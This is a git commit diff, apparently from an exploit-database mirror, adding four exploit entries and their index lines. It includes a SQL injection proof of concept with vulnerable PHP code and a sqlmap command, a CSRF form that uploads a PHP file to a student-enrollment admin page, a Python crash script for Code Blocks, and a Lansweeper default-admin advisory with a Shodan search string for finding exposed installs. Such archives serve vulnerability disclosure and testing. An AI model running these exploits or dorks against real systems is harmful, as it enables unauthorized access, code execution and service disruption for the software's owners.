DB: 2020-06-24
4 changes to exploits/shellcodes Code Blocks 20.03 - Denial Of Service (PoC) Lansweeper 7.2 - Incorrect Access Control Responsive Online Blog 1.0 - 'id' SQL Injection Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
This commit is contained in:
parent
09b5d3c1b6
commit
b8629afe42
5 changed files with 202 additions and 0 deletions
21
exploits/php/webapps/48615.txt
Normal file
21
exploits/php/webapps/48615.txt
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
|
||||||
|
# Date: 2020-06-23
|
||||||
|
# Exploit Author: Eren Şimşek
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Linux - Wamp Server
|
||||||
|
|
||||||
|
>Vulnerable File
|
||||||
|
/category.php
|
||||||
|
|
||||||
|
>Vulnerable Code
|
||||||
|
|
||||||
|
$id=$_REQUEST['id'];
|
||||||
|
$query="SELECT * from blog_categories where id='".$id."'";
|
||||||
|
Id parameter enters sql query without any changes
|
||||||
|
|
||||||
|
>Proof Of Concept
|
||||||
|
sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
|
||||||
|
OR
|
||||||
|
http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error
|
89
exploits/php/webapps/48616.txt
Normal file
89
exploits/php/webapps/48616.txt
Normal file
|
@ -0,0 +1,89 @@
|
||||||
|
# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-06-20
|
||||||
|
# Exploit Author: BKpatron
|
||||||
|
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
|
||||||
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Win 10
|
||||||
|
# CVE: N/A
|
||||||
|
# my website: bkpatron.com
|
||||||
|
|
||||||
|
# Vulnerability:
|
||||||
|
|
||||||
|
This product is unprotected against CSRF vulnerabilities.
|
||||||
|
The application interface allows users to perform certain actions
|
||||||
|
via HTTP requests without performing any validity checks to verify the
|
||||||
|
requests.
|
||||||
|
you can upload a PHP file here with CSRF.
|
||||||
|
|
||||||
|
# CSRF PoC( add student ,File Upload):
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student">
|
||||||
|
<label for="name">Student Name</label>
|
||||||
|
<input name="name" type="text" id="name" value="" required=""><br/>
|
||||||
|
<label for="roll">Student Roll</label>
|
||||||
|
<input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/>
|
||||||
|
<label for="address">Student Address</label>
|
||||||
|
<input name="address" type="text" value="" id="address" required=""><br/>
|
||||||
|
<label for="pcontact">Parant Contact NO</label>
|
||||||
|
<input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/>
|
||||||
|
<label for="class">Student Class</label>
|
||||||
|
<select name="class" class="form-control" id="class" required=""><br/>
|
||||||
|
<option>Select</option>
|
||||||
|
<option value="1st">1st</option>
|
||||||
|
<option value="2nd">2nd</option>
|
||||||
|
<option value="3rd">3rd</option>
|
||||||
|
<option value="4th">4th</option>
|
||||||
|
<option value="5th">5th</option>
|
||||||
|
</select><br/>
|
||||||
|
<label for="photo">Student Photo</label>
|
||||||
|
<input name="photo" type="file" id="photo" required=""><br/>
|
||||||
|
<input name="addstudent" value="Add Student" type="submit" class="btn btn-danger">
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
#HTTP Request:
|
||||||
|
|
||||||
|
http://localhost/student_enrollment/admin/index.php?page=add-student
|
||||||
|
|
||||||
|
POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------1586330740172
|
||||||
|
Content-Length: 1669
|
||||||
|
Referer: http://localhost/exploit2.php
|
||||||
|
Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
|
||||||
|
Connection: keep-alive
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
-----------------------------1586330740172: undefined
|
||||||
|
Content-Disposition: form-data; name="name"
|
||||||
|
bkpatron
|
||||||
|
-----------------------------1586330740172
|
||||||
|
Content-Disposition: form-data; name="roll"
|
||||||
|
|
||||||
|
333000
|
||||||
|
-----------------------------1586330740172
|
||||||
|
Content-Disposition: form-data; name="address"
|
||||||
|
|
||||||
|
0000
|
||||||
|
-----------------------------1586330740172
|
||||||
|
Content-Disposition: form-data; name="pcontact"
|
||||||
|
|
||||||
|
01911111111
|
||||||
|
-----------------------------1586330740172
|
||||||
|
Content-Disposition: form-data; name="class"
|
||||||
|
|
||||||
|
1st
|
||||||
|
-----------------------------1586330740172
|
||||||
|
Content-Disposition: form-data; name="photo"; filename="up.php"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
...
|
||||||
|
|
||||||
|
// uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
|
34
exploits/windows/dos/48617.py
Executable file
34
exploits/windows/dos/48617.py
Executable file
|
@ -0,0 +1,34 @@
|
||||||
|
# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
|
||||||
|
# Vendor Homepage: http://www.codeblocks.org/
|
||||||
|
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
|
||||||
|
# Exploit Author: Paras Bhatia
|
||||||
|
# Discovery Date: 2020-06-23
|
||||||
|
# Vulnerable Software: Code Blocks
|
||||||
|
# Version: 20.03
|
||||||
|
# Vulnerability Type: Denial of Service (DoS)
|
||||||
|
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
|
||||||
|
|
||||||
|
#Steps to Produce the Crash:
|
||||||
|
|
||||||
|
# 1.- Run python code: CodeBlocksCrash.py
|
||||||
|
# 2.- Copy content to clipboard
|
||||||
|
# 3.- Open "codeblocks.exe"
|
||||||
|
# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
|
||||||
|
# 5.- Select "Active project's symbols" from drop down "View:" menu.
|
||||||
|
# 6.- Paste ClipBoard into the "Search:" field.
|
||||||
|
# 7.- Press Enter from keyboard.
|
||||||
|
# 8.- Crashed.
|
||||||
|
|
||||||
|
|
||||||
|
##################################################################################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
#Python "CodeBlocksCrash.py" Code:
|
||||||
|
|
||||||
|
f= open("CodeBlocksCrash.txt", "w")
|
||||||
|
|
||||||
|
payload="\x41" * 5000
|
||||||
|
|
||||||
|
f.write(payload)
|
||||||
|
|
||||||
|
f.close()
|
54
exploits/windows/local/48618.txt
Normal file
54
exploits/windows/local/48618.txt
Normal file
|
@ -0,0 +1,54 @@
|
||||||
|
# Exploit Title: Lansweeper 7.2 - Incorrect Access Control
|
||||||
|
# SHODAN DORK : title:"Lansweeper - Login"
|
||||||
|
# Date: 2020-06-14
|
||||||
|
# Exploit Author: Amel BOUZIANE-LEBLOND
|
||||||
|
# Vendor Homepage: https://www.lansweeper.com/
|
||||||
|
# Software Link: https://www.lansweeper.com
|
||||||
|
# Version: 6.0.x through 7.2.x
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE : CVE-2020-14011
|
||||||
|
|
||||||
|
### Title:
|
||||||
|
Incorrect Access Control.
|
||||||
|
|
||||||
|
### Category:
|
||||||
|
Exploit
|
||||||
|
|
||||||
|
### Severity:
|
||||||
|
Critical
|
||||||
|
|
||||||
|
### Description:
|
||||||
|
Lansweeper 6.0.x through 7.2.x has a default installation in which the
|
||||||
|
admin password is configured for the admin account, unless "Built-in
|
||||||
|
admin" is manually unchecked. This allows command execution via the
|
||||||
|
Add New Package and Scheduled Deployments features.
|
||||||
|
|
||||||
|
### Other observation:
|
||||||
|
Hi, This issue is kind of critical,
|
||||||
|
By using shodan with this filter title:"Lansweeper - Login"
|
||||||
|
We will find some Lansweeper with default installation on it
|
||||||
|
|
||||||
|
|
||||||
|
### Details:
|
||||||
|
The Lansweeper application is agentless network inventory software that can be used for IT asset management.
|
||||||
|
It uses the ASP.NET technology on its web application.
|
||||||
|
|
||||||
|
### Analysis:
|
||||||
|
When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time,
|
||||||
|
you are presented with a First Run Wizard,
|
||||||
|
which allows you to set up scanning and configure some basic options.
|
||||||
|
Any subsequent times you access the console,
|
||||||
|
you are presented with a login screen.
|
||||||
|
By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.
|
||||||
|
|
||||||
|
### Suggested mitigation:
|
||||||
|
restrict access to the console and configure what users can see or do once they've been granted access.
|
||||||
|
You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts.
|
||||||
|
A user's role determines what the user can see or do within the console..
|
||||||
|
|
||||||
|
### Impact/Risk:
|
||||||
|
Remote code execution
|
||||||
|
can expose the organization to unauthorized access of data and programs, fraud.
|
||||||
|
|
||||||
|
--
|
||||||
|
Amel BOUZIANE-LEBLOND
|
|
@ -6751,6 +6751,7 @@ id,file,description,date,author,type,platform,port
|
||||||
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
|
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
|
||||||
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
|
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
|
||||||
48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
|
48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
|
||||||
|
48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -11112,6 +11113,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
|
48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
|
||||||
48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
|
48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
|
||||||
48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
|
48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
|
||||||
|
48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -42871,3 +42873,5 @@ id,file,description,date,author,type,platform,port
|
||||||
48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
|
48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
|
||||||
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
||||||
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
|
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
|
||||||
|
48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
|
||||||
|
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue